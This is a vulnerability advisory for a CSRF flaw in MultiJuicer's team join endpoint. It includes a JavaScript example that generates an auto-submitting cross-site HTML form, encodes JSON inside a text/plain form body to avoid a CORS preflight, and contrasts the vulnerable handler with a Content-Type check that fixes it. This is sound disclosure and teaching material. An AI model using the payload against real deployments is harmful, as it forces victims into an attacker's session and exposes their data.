CVE-2026-48518

Severity CVSS v4.0:
Pending analysis
Type:
CWE-352 Cross-Site Request Forgery (CSRF)
Publication date:
15/06/2026
Last modified:
15/06/2026

Description

MultiJuicer is used to run separate Juice Shop instances on a central Kubernetes cluster without the need for local instances. In versions 8.0.0 through 10.0.0, the team join endpoint (POST /multi-juicer/api/teams/{team}/join) accepted requests with any Content-Type, including text/plain. Because that content type does not trigger a CORS preflight, an attacker could host a cross-site HTML form that auto-submits to the endpoint and forces a victim's browser to log in as the attacker's team. A successful, undetected attacker can cause victims to unwittingly solve Juice Shop challenges under the attacker's team identity. In a CTF context this lets the attacker inflate their team's score using other players' activity, and any sensitive data the victim enters into "their" Juice Shop ends up in the attacker's instance. The vulnerability is exploitable without any prior authentication; the victim only needs to visit a page the attacker controls while having network access to the MultiJuicer deployment. SameSite=Strict on the session cookie does not mitigate this, because the attack plants a new cookie rather than relying on an existing one. This issue was fixed in version 10.0.1.
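The mechanism in the description, as an added example that is not code from the advisory or from the MultiJuicer project: a cross-site form with enctype="text/plain" is one of the three Content-Type values a browser sends without a CORS preflight, and its "name=value" body can be shaped so that it parses as JSON. The request object shape ({headers, params, body}), the {"passcode": ...} body field, the cookie name and the handler behaviour are assumptions made for the illustration; only the endpoint path comes from the advisory.

```javascript
// Added example, not MultiJuicer's own code. Models the text/plain CSRF
// against the join endpoint and a Content-Type check that blocks it.
// Assumed for illustration: request shape {headers, params, body}, the
// {"passcode": ...} body field and the cookie name "balancer".
"use strict";

// Content-Type values a browser may send cross-origin without a preflight
// (the CORS-safelisted request-header values for Content-Type).
const SIMPLE_CONTENT_TYPES = [
  "text/plain",
  "multipart/form-data",
  "application/x-www-form-urlencoded",
];

// Drop parameters such as "; charset=utf-8" and normalise case.
function mediaType(contentType) {
  return String(contentType || "").split(";")[0].trim().toLowerCase();
}

// Any other Content-Type forces a preflight, which fails unless the
// server explicitly allows the calling origin.
function needsPreflight(contentType) {
  return !SIMPLE_CONTENT_TYPES.includes(mediaType(contentType));
}

// How a browser serialises <form enctype="text/plain">: one "name=value"
// line per field, CRLF terminated. Used to build the attack body offline.
function encodeTextPlainForm(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join("");
}

// The attacker's single form field. Splitting the JSON between field name
// and value makes the "=" the browser inserts land inside a throwaway
// string, so the whole body is still valid JSON.
function attackerFormFields(passcode) {
  return [[`{"passcode":"${passcode}","_":"`, `"}`]];
}

// The page the victim is lured to: it submits itself on load.
function attackerPageHtml(target, team, passcode) {
  const [[name, value]] = attackerFormFields(passcode);
  return `<form id="f" method="POST" enctype="text/plain" action="${target}/multi-juicer/api/teams/${team}/join">
  <input name='${name}' value='${value}'>
</form>
<script>document.getElementById("f").submit()</script>`;
}

// Shared body handling: parse JSON and, on success, set the team cookie.
// Passcode verification is omitted; the attacker knows their own passcode.
function processJoin(req) {
  let body;
  try {
    body = JSON.parse(req.body);
  } catch (e) {
    return { status: 400, error: "invalid JSON" };
  }
  if (typeof body.passcode !== "string") {
    return { status: 400, error: "passcode required" };
  }
  // SameSite=Strict does not help: this response *plants* the cookie.
  return {
    status: 200,
    team: req.params.team,
    setCookie: `balancer=${req.params.team}; Path=/; HttpOnly; SameSite=Strict`,
  };
}

// Vulnerable shape (as described for 8.0.0 through 10.0.0): the declared
// Content-Type is never consulted.
function joinTeamVulnerable(req) {
  return processJoin(req);
}

// Hardened: require application/json. An HTML form cannot send that type,
// and a cross-origin fetch()/XHR with it is preflighted and blocked.
function joinTeamHardened(req) {
  if (mediaType(req.headers["content-type"]) !== "application/json") {
    return { status: 415, error: "Content-Type must be application/json" };
  }
  return processJoin(req);
}

// Replays the constructed attack request against both handlers.
function demo() {
  const team = "attacker-team";
  const req = {
    headers: { "content-type": "text/plain" },
    params: { team },
    body: encodeTextPlainForm(attackerFormFields("attacker-passcode")),
  };
  return { vulnerable: joinTeamVulnerable(req).status, hardened: joinTeamHardened(req).status };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(attackerPageHtml("https://multi-juicer.example", "attacker-team", "attacker-passcode"));
  console.log(demo());
}
```

The check is deliberately on the media type only: a charset parameter is still accepted, but anything a cross-site form can produce is rejected before the body is parsed. Enforcing the JSON content type is the minimal server-side fix for this class of bug; it works because the browser, not the server, refuses to send the non-safelisted type cross-origin without a successful preflight.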